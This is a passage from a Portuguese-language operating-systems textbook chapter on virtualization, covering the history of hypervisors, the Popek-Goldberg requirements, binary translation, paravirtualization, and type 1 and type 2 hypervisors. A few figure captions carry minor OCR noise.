elas se cumprimentarem ao mesmo tempo, permane- 
cerão inclinadas para a frente para sempre. Escreva 
um programa que evite um impasse. 





m algumas situações, uma organização tem um 

multicomputador, mas na realidade não gostaria de 

tê-lo. Um exemplo comum ocorre quando uma em- 

presa tem um servidor de e-mail, um de internet, 

um FTP, alguns de e-commerce, e outros. Todos 
são executados em computadores diferentes no mesmo 
rack de equipamentos, todos conectados por uma rede 
de alta velocidade, em outras palavras, um multicom- 
putador. Uma razão para todos esses servidores serem 
executados em máquinas separadas pode ser que uma 
máquina não consiga lidar com a carga, mas outra é a 
confiabilidade: a administração simplesmente não con- 
fia que o sistema operacional vá funcionar 24 horas, 
365 ou 366 dias sem falhas. Ao colocar cada serviço em 
um computador diferente, se um dos servidores falhar, 
pelo menos os outros não serão afetados. Isso é bom 
para a segurança também. Mesmo que algum invasor 
maligno comprometa o servidor da internet, ele não terá 
acesso imediatamente a e-mails importantes também — 
uma propriedade referida às vezes como caixa de areia 
(sandboxing). Embora o isolamento e a tolerância a fa- 
lhas sejam conseguidos dessa maneira, essa solução é 
cara e difícil de gerenciar, por haver tantas máquinas 
envolvidas. 

É importante salientar que essas são apenas duas 
dentre muitas razões para se manterem máquinas sepa- 
radas. Por exemplo, as organizações muitas vezes de- 
pendem de mais do que um sistema operacional para 
suas operações diárias: um servidor de internet em Li- 
nux, um servidor de e-mail em Windows, um servidor 
de e-commerce para clientes executando em OS X e al- 
guns outros serviços executando em diversas variações 
do UNIX. Mais uma vez, essa solução funciona, mas 
barata ela definitivamente não é. 


O que fazer? Uma solução possível (e popular) é 
usar a tecnologia de máquinas virtuais, o que soa muito 
inovador e moderno, mas a ideia é antiga, surgida nos 
anos 1960. Mesmo assim, a maneira como as usamos 
hoje em dia é definitivamente nova. A ideia principal é 
que um Monitor de Máquina Virtual (VMM — Vir- 
tual Machine Monitor) cria a ilusão de múltiplas má- 
quinas (virtuais) no mesmo hardware físico. Um VMM 
também é conhecido como hipervisor. Como discuti- 
mos na Seção 1.7.5, distinguimos entre os hipervisores 
tipo 1 que são executados diretamente sobre o hardwa- 
re (bare metal), e os hipervisores tipo 2 que podem fa- 
zer uso de todos os serviços e abstrações maravilhosos 
oferecidos pelo sistema operacional subjacente. De 
qualquer maneira, a virtualização permite que um úni- 
co computador seja o hospedeiro de múltiplas máquinas 
virtuais, cada uma executando potencialmente um siste- 
ma operacional completamente diferente. 

A vantagem dessa abordagem é que uma falha em 
uma máquina virtual não derruba nenhuma outra. Em 
um sistema virtualizado, diferentes servidores podem 
executar em diferentes máquinas virtuais, mantendo 
desse modo um modelo de falha parcial que um mul- 
ticomputador tem, mas a um custo mais baixo e com 
uma manutenção mais fácil. Além disso, podemos ago- 
ra executar múltiplos sistemas operacionais diferentes 
no mesmo hardware, beneficiar-nos do isolamento da 
máquina virtual diante de ataques e aproveitar outras 
coisas boas. 

É claro, consolidar servidores dessa maneira é como 
colocar todos os ovos em uma cesta. Se o servidor exe- 
cutando todas as máquinas virtuais falhar, o resultado 
é ainda mais catastrófico do que a falha de um único 
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servidor dedicado. A razão por que a virtualização fun- 
ciona, no entanto, é que a maioria das quedas de serviços 
ocorre não por causa de um hardware defeituoso, mas 
de um software mal projetado, inconfiável, defeituoso 
e mal configurado, incluindo enfaticamente os sistemas 
operacionais. Com a tecnologia de máquinas virtuais, o 
único software executando no modo de privilégio mais 
elevado é o hipervisor, que tem duas ordens de magni- 
tude de linhas a menos de código do que um sistema 
operacional completo e, desse modo, duas ordens de 
magnitude de defeitos a menos. Um hipervisor é mais 
simples do que um sistema operacional porque ele faz 
uma coisa: emular múltiplas cópias do bare metal (mais 
comumente a arquitetura x86 da Intel). 

Executar softwares em máquinas virtuais tem outras 
vantagens além do forte isolamento. Uma delas é que 
ter menos máquinas físicas poupa dinheiro em equipa- 
mentos e eletricidade e ocupa menos espaço físico. Para 
empresas como a Amazon ou a Microsoft, que podem 
ter centenas de milhares de servidores realizando uma 
enorme variedade de diferentes tarefas em cada centro 
de processamento de dados, reduzir as demandas físicas 
nos seus centros de processamento de dados representa 
uma economia enorme de custos. Na realidade, empre- 
sas de servidores frequentemente localizam seus centros 
de processamento de dados no meio do nada — apenas 
para estarem próximas, digamos, de usinas hidrelétricas 
(e energia barata). A virtualização também ajuda a tes- 
tar novas ideias. Tipicamente, em grandes empresas, os 
departamentos individuais ou grupos pensam em uma 
ideia interessante e então saem à procura e compram um 
servidor para implementá-la. Se a ideia pegar e centenas 
ou milhares de servidores forem necessários, o centro 
de processamento de dados corporativo será expandido. 
Muitas vezes é difícil mover o software para máquinas 
existentes, pois cada aplicação frequentemente precisa 
de uma versão diferente do sistema operacional, suas 
próprias bibliotecas, arquivos de configuração e mais. 
Com as máquinas virtuais, cada aplicação pode levar 
seu próprio ambiente consigo. 

Outra vantagem das máquinas virtuais é que a mi- 
gração e verificação delas (por exemplo, para o equili- 
brio de carga entre múltiplos servidores) é muito mais 
fácil do que a migração de processos executando em 
um sistema operacional normal. No segundo caso, uma 
quantidade considerável de informações de estado criti- 
cas a respeito de cada processo é mantida em tabelas do 
sistema operacional, incluindo informações relaciona- 
das com arquivos abertos, alarmes, tratadores de sinais 
e mais. Quando migrando uma máquina virtual, tudo 
o que precisa ser movido são a memória e as imagens 


de disco, já que todas as tabelas do sistema operacional 
migram, também. 

Outro uso para as máquinas virtuais é executar apli- 
cações legadas em sistemas operacionais (ou versões 
de sistemas operacionais) que não têm mais suporte, 
ou que não funcionam no hardware atual. Esses podem 
executar ao mesmo tempo e no mesmo hardware que 
as aplicações atuais. Na realidade, a capacidade de exe- 
cutar ao mesmo tempo aplicações que usam diferentes 
sistemas operacionais é um grande argumento em prol 
das máquinas virtuais. 

No entanto, outro uso importante das máquinas vir- 
tuais é para o desenvolvimento de softwares. Um pro- 
gramador que quer se certificar de que o seu software 
funciona no Windows 7, Windows 8, várias versões do 
Linux, FreeBSD, OpenBSD, NetBSD e OS X, entre ou- 
tros sistemas, não precisa mais ter uma dúzia de com- 
putadores e instalar diferentes sistemas operacionais em 
todos eles. Em vez disso, ele apenas cria uma dúzia de 
máquinas virtuais em um único computador e instala 
um diferente sistema operacional em cada uma. É claro, 
ele poderia ter dividido o disco rígido e instalado um 
sistema operacional em cada divisão, mas essa abor- 
dagem é mais difícil. Primeiro, PCs padrão suportam 
apenas quatro divisões primárias de disco, não impor- 
ta o tamanho dele. Segundo, embora um programa de 
múltiplas inicializações (multiboot) possa ser instalado 
no bloco de inicialização, seria necessário reinicializar 
o computador para trabalhar em um novo sistema ope- 
racional. Com as máquinas virtuais, todos eles podem 
executar ao mesmo tempo, pois na realidade não pas- 
sam de processos glorificados. 

Talvez o mais importante caso de uso de modismo 
para a virtualização hoje em dia é encontrado na nuvem. 
A ideia fundamental de uma nuvem é direta: terceirizar 
as suas necessidades de computação ou armazenamento 
para um centro de processamento de dados bem admi- 
nistrado e gerenciado por uma empresa especializada e 
gerida por experts na área. Como o centro de processa- 
mento de dados em geral pertence a outra empresa, você 
provavelmente terá de pagar pelo uso dos recursos, mas 
pelo menos não terá de se preocupar com as máquinas 
físicas, energia, resfriamento e manutenção. Graças ao 
isolamento oferecido pela virtualização, os provedores 
da nuvem podem permitir que múltiplos clientes, mes- 
mo concorrentes, compartilhem de uma única máquina 
física. Cada cliente recebe uma fatia do bolo. Sem que- 
rer esticar a metáfora da nuvem, mencionamos que os 
primeiros críticos mantinham que o bolo estava somen- 
te no céu e que as organizações de verdade não iriam 
querer colocar seus dados e computações sensíveis nos 


recursos de outra empresa. Hoje, no entanto, máquinas 
virtualizadas na nuvem são usadas por incontáveis or- 
ganizações para incontáveis aplicações, e embora não 
seja para todas as organizações e todos os dados, não há 
dúvida de que a computação na nuvem foi um sucesso. 


7.1 História 


Com toda a onda em torno da virtualização nos úl- 
timos anos, às vezes esquecemos que pelos padrões da 
internet as máquinas virtuais são antigas. Já na década 
de 1960, a IBM realizou experiências com não apenas 
um, mas dois hipervisores desenvolvidos independente- 
mente: SIMMON e CP-40. Embora o CP-40 tenha sido 
um projeto de pesquisa, ele foi reimplementado como 
CP-67 para formar o programa de controle do CP/CMS, 
um sistema operacional de máquina virtual para o IBM 
System/360 Model 67. Mais tarde, ele foi reimplementa- 
do novamente e lançado como VM/370 para a série Sys- 
tem/370 em 1972. A linha System/370 foi substituída pela 
IBM nos anos de 1990 pelo System/390. Foi basicamente 
uma mudança de nome, já que a arquitetura subjacente 
permaneceu a mesma por razões de compatibilidade. É 
claro, a tecnologia de hardware foi melhorada e as má- 
quinas mais novas ficaram maiores e mais rápidas que 
as antigas, mas no que diz respeito à virtualização, nada 
mudou. Em 2000, a IBM lançou a série z, que suportava 
espaços de endereço virtual de 64 bits, mas por outro lado 
seguia compatível com o System/360. Todos esses siste- 
mas davam suporte à virtualização décadas antes de ela 
tornar-se popular no x86. 

Em 1974, dois cientistas de computação da UCLA, 
Gerald Popek e Robert Goldberg, publicaram um es- 
tudo seminal (“Formal Requirements for Virtualizable 
Third Generation Architectures” — Exigências formais 
para arquiteturas de terceira geração virtualizáveis) que 
listava exatamente quais condições uma arquitetura de 
computadores deveriam satisfazer a fim de dar suporte 
à virtualização de maneira eficiente (POPEK e GOLD- 
BERG, 1974). É impossível escrever um capítulo sobre 
virtualização sem se referir ao trabalho e terminologia 
deles. Como se sabe, a conhecida arquitetura x86 que 
também surgiu na década de 1970 não atendeu a essas 
exigências por décadas. Ela não foi a única. Quase todas 
as arquiteturas desde o surgimento dos computadores 
de grande porte também falharam no teste. Os anos de 
1970 foram muito produtivos, vendo também o nasci- 
mento do UNIX, Ethernet, o Cray-1, Microsoft e Apple 
— então, apesar do que os seus pais lhe dizem, os anos 
1970 não se limitaram à moda disco! 
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Na realidade, a verdadeira revolução Disco começou 
na década de 1990, quando pesquisadores na Univer- 
sidade de Stanford desenvolveram um novo hipervisor 
com aquele nome e seguiram para fundar a VMware, um 
gigante da virtualização que oferece hipervisores tipo 1 
e tipo 2 e agora gera bilhões de dólares de lucro (BUG- 
NION et al., 1997; BUGNION et al., 2012). Inciden- 
talmente, a distinção entre hipervisores “tipo 1” e “tipo 
2” também vem dos anos 1970 (GOLDBERG, 1972). 
VMware introduziu a sua primeira solução de virtuali- 
zação para o x86 em 1999. No seu rastro vieram outros 
produtos: Xen, KVM, VirtualBox, Hyper-V, Parallels 
e muitos mais. Parece que o momento era chegado para 
a virtualização, embora a teoria tivesse sido desenvol- 
vida em 1974, e por décadas a IBM estivesse vendendo 
computadores que davam suporte — e usavam pesada- 
mente — à virtualização. Em 1999, ela tornou-se popu- 
lar com as massas, mas não era uma novidade, apesar da 
atenção enorme que ganhou subitamente. 


7.2 Exigências para a virtualização 


É importante que as máquinas virtuais atuem como o 
McCoy real. Em particular, deve ser possível inicializá- 
-las como máquinas reais, assim como instalar sistemas 
operacionais arbitrários nelas, exatamente como pode- 
mos fazer nos hardwares reais. Cabe ao hipervisor pro- 
porcionar essa ilusão e fazê-lo de maneira eficiente. De 
fato, hipervisores devem se sair bem em três dimensões: 


1. Segurança: o hipervisor deve ter o controle com- 
pleto dos recursos virtualizados. 

2. Fidelidade: o comportamento de um programa 
em uma maquina virtual deve ser idêntico aquele 
do mesmo programa executando diretamente no 
hardware. 

3. Eficiência: grande parte do código na máqui- 
na virtual deve executar sem a intervenção do 
hipervisor. 


Uma maneira inquestionavelmente segura de exe- 
cutar as instruções é considerar uma instrução de cada 
vez em um interpretador (como o Bochs) e realizar 
exatamente o que é necessário para aquela instrução. 
Algumas instruções podem ser executadas diretamente, 
mas não muitas. Por exemplo, o interpretador pode ser 
capaz de executar uma instrução de INC (incremento) 
apenas como ela é, mas instruções que não são seguras 
de executar diretamente devem ser simuladas pelo in- 
terpretador. Por exemplo, não podemos permitir de fato 
que o sistema operacional hóspede desabilite interrup- 
ções para toda a máquina ou modifique os mapeamentos 
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da tabela de páginas. O truque é fazer o sistema ope- 
racional sobre o hipervisor pensar que ele desabilitou 
as interrupções, ou mudou os mapeamentos maquinada 
tabela de páginas. Veremos como isso é feito mais tar- 
de. Por ora, só queremos dizer que o interpretador pode 
ser seguro e, se cuidadosamente implementado, talvez 
mesmo hi-fi, mas o desempenho desaponta. A fim de 
satisfazer também o critério de desempenho, veremos 
que os VMMs tentam executar a maior parte do código 
diretamente. 

Agora vamos voltar à fidelidade. A virtualização há 
muito tem sido um problema na arquitetura do x86 por 
causa de defeitos na arquitetura do Intel 386 que foram 
arrastados de forma submissa para novas CPUs por 20 
anos em nome da compatibilidade. Resumidamente, 
toda CPU com modo núcleo e modo usuário tem um 
conjunto de instruções que se comporta diferentemente 
quando executado em modo núcleo e quando executado 
em modo usuário. Incluídas aí estão instruções que re- 
alizam E/S, mudam as configurações de MMU e assim 
por diante. Popek e Goldberg as chamavam de instru- 
ções sensíveis. Há também um conjunto de instruções 
que causam uma interrupção por software, denominada 
captura (trap), se executadas no modo usuário. Popek 
e Goldberg as chamavam de instruções privilegia- 
das. O seu estudo declarava pela primeira vez que uma 
máquina somente será virtualizável se suas instruções 
sensíveis forem um subconjunto das instruções privile- 
giadas. Em uma linguagem mais simples, se você tentar 
fazer algo no modo usuário que não deveria estar fazen- 
do nesse modo, o hardware deve gerar uma captura. Di- 
ferentemente do IBM/370, que tinha essa propriedade, 
o 386 da Intel não a tinha. Algumas instruções sensíveis 
do 386 eram ignoradas se executadas no modo usuário 
ou executadas com um comportamento diferente. Por 
exemplo, a instrução POPF substitui o registrador de 
flags, que muda o bit que habilita/desabilita interrup- 
ções. No modo usuário, esse bit simplesmente não é 
modificado. Em consequência, o 386 e seus sucessores 
não podiam ser virtualizados, quê; portanto, não podiam 
dar suporte a um hipervisor diretamente. 

Na realidade, a situação é ainda pior do que o traçado 
em linhas gerais. Além dos problemas com instruções 
que falham em gerar capturas no modo usuário, existem 
instruções que podem ler estados sensíveis em modo 
usuário sem causar uma captura. Por exemplo, nos pro- 
cessadores x86 antes de 2005, um programa pode deter- 
minar se ele está executando em modo usuário ou modo 
núcleo lendo seu seletor de código de segmento. Um 
sistema operacional que fizesse isso e descobrisse que 


ele estava na realidade no modo usuário poderia tomar 
uma decisão incorreta com base nessa informação. 

Esse problema foi enfim solucionado quando a Intel 
e a AMD introduziram a virtualização nas suas CPUs 
começando em 2005 (UHLIG, 2005). Nas CPUs da In- 
tel ela é chamada de Tecnologia de Virtualização (VT 
— Virtualization Technology); nas CPUs da AMD ela 
é chamada de Máquina Virtual Segura (SVM — Se- 
cure Virtual Machine). Usaremos o termo VT em um 
sentido genérico a seguir. Ambos foram inspirados pelo 
trabalho VM/370 da IBM, mas são ligeiramente dife- 
rentes. A ideia básica é criar contêineres nos quais as 
máquinas virtuais podem executar. Quando um sistema 
operacional hóspede é inicializado em um contêiner, 
ele continua a executar ali até causar uma exceção e 
gerar uma captura que chaveia para o hipervisor, por 
exemplo, executando uma instrução de E/S. O conjunto 
de operações que geram capturas é controlado por um 
mapa de bits do hardware estabelecido pelo hipervisor. 
Com essas extensões, a abordagem de máquina virtual 
clássica trap-and-emulate (captura e emulação) torna- 
-se possível. 

O leitor astuto deve ter observado uma contradição 
aparente na descrição até aqui. Por um lado, dissemos 
que o x86 não era virtualizável até as extensões de ar- 
quitetura em 2005. Por outro, vimos que a VMware 
lançou o seu primeiro hipervisor x86 em 1999. Como 
ambos podem ser verdadeiros ao mesmo tempo? A res- 
posta é que os hipervisores antes de 2005 na realidade 
não executavam o sistema operacional hóspede origi- 
nal. Em vez disso, eles reescreviam parte do código 
durante a execução para substituir instruções proble- 
máticas com sequências de código seguras que emula- 
vam a instrução original. Suponha, por exemplo, que 
o sistema operacional hóspede desempenhasse uma 
instrução de E/S privilegiada, ou modificasse um dos 
registros de controle privilegiados da CPU (como o re- 
gistro CR3 que contém um ponteiro para o diretório 
de página). É importante que as consequências des- 
sas instruções sejam limitadas a essa máquina virtual 
e não afetem outras máquinas virtuais, ou o próprio 
hipervisor. Desse modo, uma instrução de E/S inse- 
gura foi substituída por uma captura que, após uma 
conferência de segurança, realizava uma instrução 
equivalente e retornava o resultado. Como estamos 
reescrevendo, podemos usar o truque para substituir 
instruções que são sensíveis, mas não privilegiadas. 
Outras instruções executam nativamente. A técnica é 
conhecida como tradução binária, que discutiremos 
com mais detalhes na Seção 7.4. 


Não há necessidade de reescrever todas as instru- 
ções sensíveis. Em particular, os processos do usuário 
sobre o hóspede podem ser executados sem modifi- 
cação. Se a instrução não é privilegiada, mas sensi- 
vel, e comporta-se diferentemente nos processos do 
usuário e no núcleo, não há problema. Nós a estamos 
executando no ambiente do usuário, de qualquer ma- 
neira. Para instruções sensíveis que são privilegiadas, 
podemos recorrer à alternativa clássica de captura e 
emulação (trap-and-emulate), como sempre. É claro, 
o VMM deve assegurar que elas recebam as capturas 
correspondentes. Em geral, o VMM tem um módulo 
que executa no núcleo e redireciona as capturas para 
seus próprios tratadores. 

Uma forma diferente de virtualização é conhecida 
como a paravirtualização. Ela é bastante diferente da 
virtualização completa, pois nunca busca apresentar 
uma máquina virtual que pareça exatamente igual ao 
hardware subjacente. Em vez disso, apresenta uma in- 
terface de software semelhante a uma máquina que 
expõe explicitamente o fato de que se trata de um am- 
biente virtualizado. Por exemplo, ela oferece um con- 
junto de hiperchamadas (hypercalls), que permitem 
ao hóspede enviar solicitações explícitas ao hipervi- 
sor (assim como uma chamada de sistema oferece ser- 
viços do núcleo para aplicações). Convidados usam 
hiperchamadas para operações sensíveis privilegiadas 
como atualizar tabelas de páginas, mas como elas o 
fazem explicitamente em cooperação com o hipervi- 
sor, O sistema como um todo pode ser mais simples e 
mais rápido. 

Não deve causar surpresa alguma que a paravirtuali- 
zação não é nada de novo também. O sistema operacio- 
nal VM da IBM ofereceu esta facilidade, embora sob um 
nome diferente, desde 1972. A ideia foi revivida pelos 
monitores de máquinas virtuais Denali (WHITAKER et 
al., 2002) e Xen (BARHAM et al., 2003). Comparada 
com a virtualização completa, o problema da paravirtua- 
lização é que o hóspede tem de estar ciente do API da má- 
quina virtual. Isso significa que ela deve ser customizada 
explicitamente para o hipervisor. 

Antes que nos aprofundemos mais nos hipervisores 
tipo 1 e tipo 2, é importante mencionar que nem toda 
tecnologia de virtualização tenta fazer o hóspede acre- 
ditar que ele tem o sistema inteiro. As vezes, O obje- 
tivo é apenas permitir que um processo execute o que 
foi originalmente escrito para um sistema operacional 
e/ou arquitetura diferentes. Portanto, distinguimos en- 
tre a virtualização de sistema completa e a virtualiza- 
ção ao nível de processo. Embora nos concentremos 
na primeira no restante deste capítulo, a tecnologia de 


Capítulo 7 VIRTUALIZAÇÃO E A NUVEM | Ey.) 


virtualização em nivel de processo é usada na prática 
também. Exemplos bastante conhecidos incluem a ca- 
mada de compatibilidade WINE, que permite que uma 
aplicação Windows execute em sistemas em confor- 
midade com o POSIX, como Linux, BSD e OS X, ea 
versão em nível de processo do emulador QEMU que 
permite que aplicações para uma arquitetura executem 
em outra. 


7.3 Hipervisores tipo 1 e tipo 2 


Goldberg (1972) distinguiu entre duas abordagens 
para a virtualização. Um tipo de hipervisor, chamado 
de hipervisor tipo 1 está ilustrado na Figura 7.1(a). 
Tecnicamente, ele é como um sistema operacional, 
já que é o único programa executando no modo mais 
privilegiado. O seu trabalho é dar suporte a múltiplas 
cópias do hardware real, chamadas máquinas virtu- 
ais, similares aos processos que um sistema operacio- 
nal normal executa. 

Em comparação, um hipervisor tipo 2, mostrado na 
Figura 7.1(b), é um tipo diferente de animal. Ele é um 
programa que depende do, digamos, Windows ou Linux 
para alocar e escalonar recursos, de maneira bastante si- 
milar a um processo regular. É claro, o hipervisor tipo 2 
ainda finge ser um computador completo com uma CPU 
e vários dispositivos. Ambos os tipos de hipervisores 
devem executar o conjunto de instruções da máquina de 
uma maneira segura. Por exemplo, um sistema opera- 
cional executando sobre o hipervisor pode mudar e até 
bagunçar as suas próprias tabelas de páginas, mas não 
as dos outros. 

O sistema operacional executando sobre o hiper- 
visor em ambos os casos é chamado de sistema ope- 
racional hóspede. Para o hipervisor tipo 2, o sistema 
operacional executando sobre o hardware é chama- 
do de sistema operacional hospedeiro. O primei- 
ro hipervisor tipo 2 no mercado x86 foi o VMware 
Workstation (BUGNION et al., 2012). Nesta seção, 
introduzimos a ideia geral. Um estudo do VMware se- 
gue na Seção 7.12. 

Hipervisores tipo 2, às vezes referidos como hiper- 
visores hospedados, dependem para uma grande parte 
de sua funcionalidade de um sistema operacional hos- 
pedeiro como o Windows, Linux ou OS X. Quando ele 
inicializa pela primeira vez, age como um computa- 
dor recentemente inicializado e espera para encontrar 
um DVD, unidade de USB ou CD-ROM contendo um 
sistema operacional na unidade. Dessa vez, no entan- 
to, a unidade poderia ser um dispositivo virtual. Por 
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exemplo, é possível armazenar a imagem como um ar- 
quivo ISO no disco rígido do hospedeiro e fazer que o 
hipervisor finja que está lendo de uma unidade de DVD 
correta. Ele então instala o sistema operacional para o 
seu disco virtual (de novo, realmente apenas um arqui- 
vo Windows, Linux ou OS X) executando o programa 
de instalação encontrado no DVD. Assim que o sistema 
operacional hóspede estiver instalado no disco virtual, 
ele pode ser inicializado e executado. 

As várias categorias de virtualização que discuti- 
mos estão resumidas na tabela da Figura 7.2, tanto para 
os hipervisores tipo 1 quanto tipo 2. São dados alguns 
exemplos para cada combinação de hipervisor e tipo de 
virtualização. 
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7.4 Técnicas para virtualização eficiente 


A capacidade de virtualização e o desempenho são 
questões importantes, então vamos examiná-las mais de 
perto. Presuma, por ora, que temos um hipervisor tipo 
1 dando suporte a uma máquina virtual, como mostra- 
do na Figura 7.3. Como todos os hipervisores tipo 1, 
ele executa diretamente no hardware. A máquina virtual 
executa como um processo do usuário no modo usuá- 
rio e, como tal, não lhe é permitido executar instruções 
sensíveis (no sentido Popek-Goldberg). No entanto, a 
máquina virtual executa um sistema operacional hóspe- 
de que acredita que ele está no modo núcleo (embora, é 
claro, ele não esteja). Chamamos isso de modo núcleo 


KeU: A) Exemplos de hipervisores. Hipervisores tipo 1 executam diretamente no hardware enquanto hipervisores tipo 2 usam os 
serviços de um sistema operacional hospedeiro existente. 
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alelo Tide) Quando o sistema operacional em uma máquina virtual executa uma instrução somente de núcleo, ele chaveia para o 
hipervisor com uma captura se a tecnologia de visualização estiver presente. 
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virtual. A máquina virtual também executa processos 
do usuário, que acreditam que eles estão no modo usuá- 
rio (e realmente estão). 

O que acontece quando o sistema operacional hóspe- 
de (que acredita que ele está em modo núcleo) executa 
uma instrução que é permitida somente quando a CPU 
está de fato em modo núcleo? Em geral, em CPUs sem 
VT, a instrução falha e o sistema operacional cai. Em 
CPUs com VT, quando o sistema operacional hóspe- 
de executa uma instrução sensível, ocorre uma captura 
para o hipervisor, como ilustrado na Figura 7.3. O hi- 
pervisor pode então inspecionar a instrução para ver se 
ela foi emitida pelo sistema operacional hóspede ou por 
um programa usuário na máquina virtual. No primeiro 
caso, ele arranja para que a instrução seja executada; no 
segundo caso, emula o que o hardware de verdade faria 
se confrontado com uma instrução sensível executada 
em modo usuário. 


7.4.1 Virtualizando o “invirtualizável” 


Construir um sistema de máquina virtual é algo re- 
lativamente direto quando o VT está disponível, mas 
o que as pessoas faziam antes disso? Por exemplo, 
VMware lançou um hipervisor bem antes da chegada 
das extensões de virtualização no x86. Outra vez, a res- 
posta é que os engenheiros de software que construíram 
esses sistemas fizeram um uso inteligente da tradução 
binária e características de hardware que existiam no 
x86, como os anéis de proteção do processador. 

Por muitos anos, o x86 deu suporte a quatro modos 
de proteção ou anéis. O anel 3 é o menos privilegiado. É 
aí que os processos do usuário normais executam. Nesse 
anel, você não pode executar instruções privilegiadas. 
O anel O é o mais privilegiado que permite a execu- 
ção de qualquer instrução. Em uma operação normal, 
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o nucleo executa no anel 0. Os dois anéis restantes não 
são usados por qualquer sistema operacional atual. Em 
outras palavras, os hipervisores eram livres para usá- 
-los quando queriam. Como mostrado na Figura 7.4, 
muitas soluções de virtualização, portanto, mantinham 
o hipervisor em modo núcleo (anel 0) e as aplicações 
em modo usuário (anel 3), mas colocavam o sistema 
operacional hóspede em uma camada de privilégio in- 
termediário (anel 1). Como resultado, o núcleo é privi- 
legiado em relação aos processos do usuário, e qualquer 
tentativa de acessar a memória do núcleo a partir de um 
programa do usuário leva a uma violação de acesso. Ao 
mesmo tempo, as instruções privilegiadas do sistema 
operacional hóspede geram capturas para o hipervisor. 
O hipervisor realiza algumas verificações de sanidade 
e então desempenha as instruções em prol do hóspede. 
Quanto às instruções sensíveis no código núcleo 
do hóspede: o hipervisor certifica-se de que elas não 
existem mais. Para fazê-lo, ele reescreve o código, um 
bloco básico de cada vez. Um bloco básico é uma se- 
quência de instruções curta, em linha reta, que termina 
com uma ramificação. Por definição, um bloco básico 
não contém salto, chamada, captura, retorno ou outra 
instrução que altere o fluxo de controle, exceto pela 
última instrução que faz precisamente isso. Um pouco 
antes de executar um bloco básico, o hipervisor primei- 
ro o varre para ver se ele contém instruções sensíveis 
(no sentido de Popek e Goldberg), e se afirmativo, as 
substitui com uma chamada para uma rotina de hipervi- 
sor que lida com elas. A ramificação na última instrução 
também é substituída por uma chamada no hipervisor 
(para ter certeza de que ela possa repetir a rotina para o 
próximo bloco básico). A tradução dinâmica e a emu- 
lação soam caras, mas geralmente não são. Blocos tra- 
duzidos são colocados em cache, portanto nenhuma 
tradução é necessária no futuro. Também, a maioria 
dos blocos em código não contém instruções sensíveis 


les TWALS O tradutor binário reescreve o sistema operacional hóspede executando no anel 1, enquanto o hipervisor executa no anel O. 
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ou privilegiadas, e assim pode executar nativamente. 
Em particular, enquanto o hipervisor configurar o 
hardware cuidadosamente (como é feito, por exemplo, 
pela VMware), o tradutor binário pode ignorar todos 
os processos do usuário; eles executam em modo não 
privilegiado de qualquer maneira. 

Após um bloco básico ter completado sua execução, 
o controle é retornado ao hipervisor, que então localiza 
o seu sucessor. Se o sucessor já foi traduzido, ele pode 
ser executado imediatamente. De outra maneira, ele é 
primeiro traduzido, armazenado em cache, então execu- 
tado. Em consequência, a maior parte do programa esta- 
rá na cache e executará em uma velocidade próxima do 
máximo. Várias otimizações são usadas, por exemplo, 
se um bloco básico termina saltando para (ou chaman- 
do) outro, a instrução final pode ser substituída por um 
salto ou chamada diretamente para o bloco básico tra- 
duzido, eliminando toda a sobrecarga associada a como 
encontrar o bloco sucessor. De novo, não há necessi- 
dade de substituir instruções sensíveis em programas 
do usuário; o hardware vai simplesmente ignorá-las de 
qualquer maneira. 

Por outro lado, é comum realizar tradução biná- 
ria em todo o código do sistema operacional hóspede 
executando no anel 1 e substituir mesmo as instruções 
sensíveis privilegiadas que, em princípio, poderiam ser 
obrigadas a gerar capturas também. A razão é que cap- 
turas são muito caras e a tradução binária leva a um de- 
sempenho melhor. 

Até o momento descrevemos um hipervisor tipo 1. 
Embora hipervisores tipo 2 sejam conceitualmente di- 
ferentes dos hipervisores tipo 1, eles usam, como um 
todo, as mesmas técnicas. Por exemplo, o VMware ESX 
Server (um hipervisor tipo 1 lançado pela primeira vez 
em 2001) usa exatamente a mesma tradução binária que 
o primeiro VMware Workstation (um hipervisor tipo 2 
lançado dois anos antes). 

No entanto, para executar o código hóspede nativa- 
mente e usar exatamente as mesmas técnicas exige que 
o hipervisor tipo 2 manipule o hardware no nível mais 
baixo, o que não pode ser feito do espaço do usuário. 
Por exemplo, ele tem de estabelecer os descritores do 
segmento para exatamente o valor correto para o código 
hóspede. Para uma virtualização fiel, o sistema opera- 
cional hóspede também deve ser enganado para pensar 
que ele é o “rei” do pedaço, com o controle absoluto de 
todos os recursos da máquina e com acesso ao espaço de 
endereçamento inteiro (4 GB em máquinas de 32 bits). 
Quando o rei encontrar outro rei (o núcleo do hospedei- 
ro) ocupando seu espaço de endereçamento, ele não vai 
achar graça. 


Infelizmente, é isso mesmo que acontece quando o 
hóspede executa como um processo do usuário em um 
sistema operacional regular. Por exemplo, no Linux, 
um processo do usuário tem acesso a apenas 3 GB dos 
4 GB de espaço de endereçamento, à medida que 1 GB 
restante é reservado para o núcleo. Qualquer acesso à 
memória do núcleo leva a uma captura. Em princípio, 
é possível assumir a captura e emular as ações apro- 
priadas, mas fazê-lo é caro e em geral exige instalar o 
tratador de capturas apropriado no núcleo hospedeiro. 
Outra maneira (óbvia) de solucionar o problema dos 
dois reis é reconfigurar o sistema para remover o sis- 
tema operacional hospedeiro e de fato dar ao hóspede 
o espaço de endereçamento inteiro. No entanto, fazê-lo 
claramente não é possível a partir do espaço do usuário 
tampouco. 

Da mesma maneira, o hipervisor precisa lidar com 
as interrupções para fazer a coisa certa, por exemplo, 
quando o disco envia uma interrupção ou ocorre uma 
falta de página. Também, se o hipervisor quiser usar a 
captura e emulação para instruções privilegiadas, ele 
precisará receber as capturas. Mais uma vez, instalar 
tratadores de captura/interrupção no núcleo não é possi- 
vel para processos do usuário. 

Portanto, a maioria dos hipervisores modernos do 
tipo 2 tem um módulo núcleo operando no anel O que 
os permite manipular o hardware com instruções privi- 
legiadas. É claro, não há problema algum em manipular 
o hardware no nível mais baixo e dar ao hóspede acesso 
ao espaço de endereçamento completo, mas em deter- 
minado ponto o hipervisor precisa limpá-lo e restaurar 
o contexto do processador original. Suponha, por exem- 
plo, que o hóspede está executando quando chega uma 
interrupção de um dispositivo externo. Dado que um 
hipervisor tipo 2 depende dos drivers de dispositivos 
do hospedeiro para lidar com a interrupção, ele precisa 
reconfigurar o hardware completamente para executar 
o código de sistema operacional hospedeiro. Quando o 
driver do dispositivo executa, ele encontra tudo como ele 
esperava que estivesse. O hipervisor comporta-se como 
adolescentes dando uma festa quando os pais estão fora. 
Não há problema em rearranjar todos os móveis, desde 
que, antes de os pais voltarem, eles o coloquem de volta 
exatamente como os haviam encontrado. Ir de uma con- 
figuração de hardware para o núcleo hospedeiro para 
uma configuração para o sistema operacional hóspede 
